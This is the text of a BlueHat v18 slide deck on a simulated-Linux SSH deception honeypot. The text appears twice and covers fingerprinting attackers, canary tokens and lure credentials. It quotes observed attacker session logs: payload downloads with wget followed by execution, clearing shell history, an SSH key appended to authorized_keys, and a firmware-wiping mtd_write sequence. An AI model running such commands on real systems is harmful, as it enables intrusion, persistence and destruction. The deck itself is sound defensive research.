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BlueHat v18 || The matrix has you - protecting linux using deception


BlueHat v18 || The matrix has you - protecting linux using deception


‘Script kiddy’
Organised groups
High impact, low frequency
High frequency, arguably also high impact
Generally easily rebuked via
Software updates& firewalletc
FT Analysts, red teaming


1500 identical
All the commands typed
in less than 500 times
Real people
The biggest bots
Raspberry PI
Botnet attacks


Anatomy of a Linux attack
1. Exploit and immediate action
2. Brute force and immediate action
3. Brute force creds…move to different infrastructure…and action
• Coin mining is extremely popular


BlueHat v18 || The matrix has you - protecting linux using deception


What is deception?
• Emerging area of InfoSec
• Usually centred around the
human behind the attack
• Has actually been around a
long time


• Standard technique to study attackers for many years
• Low – dumb listener / just log network connections
• Medium – emulate key services
• High – actual OS


Honeypots are broken!
• Relatively easy to spot a honeypot
• Lots of ports, Shodan, odd routes to the Internet
• Honeypots tell you about an attack but not the attacker
• Do we care about the attack or the attacker?
• Deception is usually used for alerting, can we use it for tracking?


Honeypots & the fog of war
Only success


Enter the hybrid
Only success
Extreme cases
Only failure


• Provide an environment that appears to be legitimate
• Take the best of low / medium interaction honeypots
• Add faults to cause an attacker to take alternative actions
• Faults are targeted to collect information we want
• New IPs, files, URLs etc
• Combine with traditional honeypots to see the outcome of an attack


BlueHat v18 || The matrix has you - protecting linux using deception


BlueHat v18 || The matrix has you - protecting linux using deception


BlueHat v18 || The matrix has you - protecting linux using deception


BlueHat v18 || The matrix has you - protecting linux using deception


BlueHat v18 || The matrix has you - protecting linux using deception


These are your tools
• Lies
• Persuasion
• Mimicry
• Distraction
• Traps & Decoys
• Lures & Breadcrumbs
• Everything society told you not to do!


Threat model
• Not bots
• Just need a good simulation
• Not state / APT
• Simulation won’t be good enough
• High end actors are targeted in their attacks, won’t find us etc
• Middle ground
• Real people, script kiddies




BlueHat v18 || The matrix has you - protecting linux using deception


How is it implemented?
• 100% C# SSH implementation with Bash/Linux simulator on top
• Can PuTTY, SFTP & SCP, Docker, MySQL (and more)
• Logs all TCP/SYN for trends
3 attemptsto login, successful loginsare cached
Kernel & OS is randomised
Results are canned or coded in C#
100% simulation, nothing is
ever executed


Processing Results
and tools
UK &
Threat intel
VMs on Azure and other


Format data as JSON,
Code on GitHub to upload
Query in NRT


Listening carefully
• SSH protocol is complex
• It’s remote access, it’s a proxy, it’s file transfer
• Bit like SSL/TLS, you start by negotiating crypto
• Client/server say what algorithms they support
• Messages are passed from client to server and responded to
• Lots of extensions (such as PuTTY ones)


What do we get by listening hard?
• The client sends machine specific data to the server
• ciphers, agent strings, supported modes, terminal size
• Environment variables (we see locale’s)
• The first packet comes from the attackers machines
• This has some magic fields: TTL, Window size, TCP timestamp


And the point of all this?
• Can use sources of entropy to build a fingerprint & track across
• We can work out
• Attackers real OS
• How deep they are in a network
• How long their machine has been up (highly unreliable)
• Can compare real OS to the SSH agent banner
• Maybe even look up identity!
• https://github.com/FiloSottile/whosthere


BlueHat v18 || The matrix has you - protecting linux using deception


Hybrid theory
• We want URLs
• Need to balance enumeration with attacker expectations
• Small wins & the rule of three
• Include reason why!
user@exploited:~$ wget 374.53.15.95/test.jpg –O a.out
Resolving baddomain.com (baddomain.com)... failed: Name or service not known.
user@exploited:~$ curl 374.53.15.95/test.jpg
curl: (22) The requested URL returned error: 403 Forbidden
user@exploited:~$ curl newdomain.com/test.jpg
user@exploited:~$ chmod +x a.out


Enrich existing data
• A lot of malware is uploaded in ZIP format
• ZIP spec doesn’t contain much machine specific metadata
• TAR does!
user@exploited:~$ unzip malware.zip
bash: unzip: command not found
user@exploited:~$ tar
tar: You must specify one of the `-Acdtrux' or `--test-label' options
Try `tar --help' or `tar --usage' for more information.


Tracking stolen data
• When attackers break in they nose around
• Might be looking for more creds
• Might be looking for data to steal
• Tokens used for years to signal when an attack has started
• https://canarytokens.org/generate
• We know we are under attack


How does it work?
AWS credentials
using them triggers an email alert
Visiting the URL triggers an email alert
Hosting real files on the honeypot


BlueHat v18 || The matrix has you - protecting linux using deception


BlueHat v18 || The matrix has you - protecting linux using deception


BlueHat v18 || The matrix has you - protecting linux using deception


BlueHat v18 || The matrix has you - protecting linux using deception


user@billingserver:~$ uname –a
Linux billingserver 4.15.0-1013
user@billingserver:~$ cat link.txt
This is the link to the temp mobile site, creds paydbadmin:!pP543fddgZ@
Was so long I had to shorten it! DO NOT SHARE AROUND!!!
user@billingserver:~$ wget XXXXXXXX.altervista.org/scan.jpg –O a.out
Resolving altervista.org (altervista.org)... failed: Name or service not known.
user@billingserver:~$ wget http://111.222.333.444/scan.jpg
Resolving 111.222.333.444 (111.222.333.444)... failed: Name or service not known.
user@billingserver:~$ history -c
user@billingserver:~$ wget https://raw.githubusercontent.com/XXXX/XXX/master/source.zip
user@billingserver:~$ unzip source.zip
unzip: cannot find libzip1.so - found libgz.so libbz.so
user@billingserver:~$ wget https://raw.githubusercontent.com/XXXX/XXX/master/source.tgz
user@billingserver:~$ tar xvf && cd source
user@billingserver:~$ gcc main.c && ./a.out
Segmentation fault
Broadcast message from root@exploited
The system is shutting down in 1m due to UPS failure
user@billingserver:~$ echo 'ssh-rsa AAAAB3NzaC1yc2EAA==' >> ~/.ssh/authorized_keys
user@billingserver:~$ chmod +x a.out && .a.out


BlueHat v18 || The matrix has you - protecting linux using deception


BlueHat v18 || The matrix has you - protecting linux using deception


From DigitalOcean to Romania
a real attack mounted by a real person
Logs in from
& tries to installcoinminer
Visits link from
(IP is clean)
I see an attacker visit
the link from a RomanianIP
I see info on an attack
launchedfrom a DigitalOceanIP
& the Monero mining account


People making mistakes


BlueHat v18 || The matrix has you - protecting linux using deception


BlueHat v18 || The matrix has you - protecting linux using deception


Attackers proxying


A glitch in the matrix! Attacker
of the
Racist profanityremoved!


A glitch in the matrix!
user@exploited:~$ lscpu
user@exploited:~$ nproc
user@exploited:~$ clear
user@exploited:~$ sudo su
root@:~$ cat /etc/*-release
cat: /etc/*-release: No such file or directory
user@exploited:~$ sudo su
root@:~$ cat /proc/mounts
root@:~$ cat /dev/urandom | mtd_write mtd0 - 0 32768
root@:~$ iproute del default
root@:~$ iptables -A INPUT -j DROP
root@:~$ reboot


‘White hat’ tries to fix my box
• Spare a thought for the attacker who ran ~60 commands
and spent 10m trying to fix the HP’s DNS resolver!


on this data


BlueHat v18 || The matrix has you - protecting linux using deception


• We use deception technology to protect customers
• Understand the attacker as well as the attack
• Use Azure Security Centre to start benefiting
• Big data? Use Log Analytics and Kusto
• Ross.Bevington@Microsoft.com

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BlueHat v18 || The matrix has you - protecting linux using deception

  • 3. APT Nation state Automated Bots ‘Script kiddy’ Organised groups Crime/hacktivism High impact, low frequency EAPT High frequency, arguably also high impact Generally easily rebuked via Software updates& firewalletc FT Analysts, red teaming
  • 4. 1500 identical commands All the commands typed in less than 500 times Real people The biggest bots MIRAI etc Raspberry PI Botnet attacks
  • 5. Anatomy of a Linux attack 1. Exploit and immediate action 2. Brute force and immediate action 3. Brute force creds…move to different infrastructure…and action • Coin mining is extremely popular
  • 7. What is deception? • Emerging area of InfoSec • Usually centred around the human behind the attack • Has actually been around a long time
  • 8. Honeypots • Standard technique to study attackers for many years • Low – dumb listener / just log network connections • Medium – emulate key services • High – actual OS
  • 9. Honeypots are broken! • Relatively easy to spot a honeypot • Lots of ports, Shodan, odd routes to the Internet • Honeypots tell you about an attack but not the attacker • Do we care about the attack or the attacker? • Deception is usually used for alerting, can we use it for tracking?
  • 10. Honeypots & the fog of war Only success
  • 11. Enter the hybrid Only success Extreme cases Only failure Traditional honeypots
  • 12. Hybrid • Provide an environment that appears to be legitimate • Take the best of low / medium interaction honeypots • Add faults to cause an attacker to take alternative actions • Faults are targeted to collect information we want • New IPs, files, URLs etc • Combine with traditional honeypots to see the outcome of an attack
  • 18. These are your tools • Lies • Persuasion • Mimicry • Distraction • Traps & Decoys • Lures & Breadcrumbs • Everything society told you not to do!
  • 19. Threat model • Not bots • Just need a good simulation • Not state / APT • Simulation won’t be good enough • High end actors are targeted in their attacks, won’t find us etc • Middle ground • Real people, script kiddies
  • 22. How is it implemented? • 100% C# SSH implementation with Bash/Linux simulator on top • Can PuTTY, SFTP & SCP, Docker, MySQL (and more) • Logs all TCP/SYN for trends 3 attemptsto login, successful loginsare cached Kernel & OS is randomised Results are canned or coded in C# 100% simulation, nothing is ever executed
  • 23. Deployment Processing Results Log Analytics Virus Total Internal sources and tools Japan UK & EU West USA Central USA West Threat intel feeds MSRC VMs on Azure and other providers
  • 24. Format data as JSON, Code on GitHub to upload Query in NRT
  • 25. Listening carefully • SSH protocol is complex • It’s remote access, it’s a proxy, it’s file transfer • Bit like SSL/TLS, you start by negotiating crypto • Client/server say what algorithms they support • Messages are passed from client to server and responded to • Lots of extensions (such as PuTTY ones)
  • 26. What do we get by listening hard? • The client sends machine specific data to the server • ciphers, agent strings, supported modes, terminal size • Environment variables (we see locale’s) ^ really • The first packet comes from the attackers machines • This has some magic fields: TTL, Window size, TCP timestamp
  • 27. And the point of all this? • Can use sources of entropy to build a fingerprint & track across infrastructure • We can work out • Attackers real OS • How deep they are in a network • How long their machine has been up (highly unreliable) • Can compare real OS to the SSH agent banner • Maybe even look up identity! • https://github.com/FiloSottile/whosthere
  • 29. Hybrid theory • We want URLs • Need to balance enumeration with attacker expectations • Small wins & the rule of three • Include reason why! user@exploited:~$ wget 374.53.15.95/test.jpg –O a.out Resolving baddomain.com (baddomain.com)... failed: Name or service not known. user@exploited:~$ curl 374.53.15.95/test.jpg curl: (22) The requested URL returned error: 403 Forbidden user@exploited:~$ curl newdomain.com/test.jpg user@exploited:~$ chmod +x a.out
  • 30. Enrich existing data • A lot of malware is uploaded in ZIP format • ZIP spec doesn’t contain much machine specific metadata • TAR does! user@exploited:~$ unzip malware.zip bash: unzip: command not found user@exploited:~$ tar tar: You must specify one of the `-Acdtrux' or `--test-label' options Try `tar --help' or `tar --usage' for more information.
  • 31. Tracking stolen data • When attackers break in they nose around • Might be looking for more creds • Might be looking for data to steal • Tokens used for years to signal when an attack has started • https://canarytokens.org/generate • We know we are under attack
  • 32. How does it work? AWS credentials using them triggers an email alert Visiting the URL triggers an email alert Hosting real files on the honeypot
  • 37. user@billingserver:~$ uname –a Linux billingserver 4.15.0-1013 user@billingserver:~$ cat link.txt This is the link to the temp mobile site, creds paydbadmin:!pP543fddgZ@ Was so long I had to shorten it! DO NOT SHARE AROUND!!! https://bit.ly/2oWZ2aL user@billingserver:~$ wget XXXXXXXX.altervista.org/scan.jpg –O a.out Resolving altervista.org (altervista.org)... failed: Name or service not known. user@billingserver:~$ wget http://111.222.333.444/scan.jpg Resolving 111.222.333.444 (111.222.333.444)... failed: Name or service not known. user@billingserver:~$ history -c user@billingserver:~$ wget https://raw.githubusercontent.com/XXXX/XXX/master/source.zip user@billingserver:~$ unzip source.zip unzip: cannot find libzip1.so - found libgz.so libbz.so user@billingserver:~$ wget https://raw.githubusercontent.com/XXXX/XXX/master/source.tgz user@billingserver:~$ tar xvf && cd source user@billingserver:~$ gcc main.c && ./a.out Segmentation fault user@billingserver:~$ Broadcast message from root@exploited The system is shutting down in 1m due to UPS failure user@billingserver:~$ echo 'ssh-rsa AAAAB3NzaC1yc2EAA==' >> ~/.ssh/authorized_keys ALL USERS MUST AGREE TO THE TERMS & CONDITIONS user@billingserver:~$ chmod +x a.out && .a.out
  • 40. From DigitalOcean to Romania a real attack mounted by a real person Logs in from & tries to installcoinminer downloads‘link.txt’ Visits link from (IP is clean) I see an attacker visit the link from a RomanianIP I see info on an attack launchedfrom a DigitalOceanIP & the Monero mining account
  • 45. A glitch in the matrix! Attacker of the month Racist profanityremoved!
  • 46. A glitch in the matrix! user@exploited:~$ lscpu … user@exploited:~$ nproc 8 user@exploited:~$ clear user@exploited:~$ sudo su root@:~$ cat /etc/*-release cat: /etc/*-release: No such file or directory user@exploited:~$ sudo su root@:~$ cat /proc/mounts root@:~$ cat /dev/urandom | mtd_write mtd0 - 0 32768 root@:~$ iproute del default root@:~$ iptables -A INPUT -j DROP root@:~$ reboot
  • 47. ‘White hat’ tries to fix my box • Spare a thought for the attacker who ran ~60 commands and spent 10m trying to fix the HP’s DNS resolver!
  • 50. tl;dr • We use deception technology to protect customers • Understand the attacker as well as the attack • Use Azure Security Centre to start benefiting • Big data? Use Log Analytics and Kusto • Ross.Bevington@Microsoft.com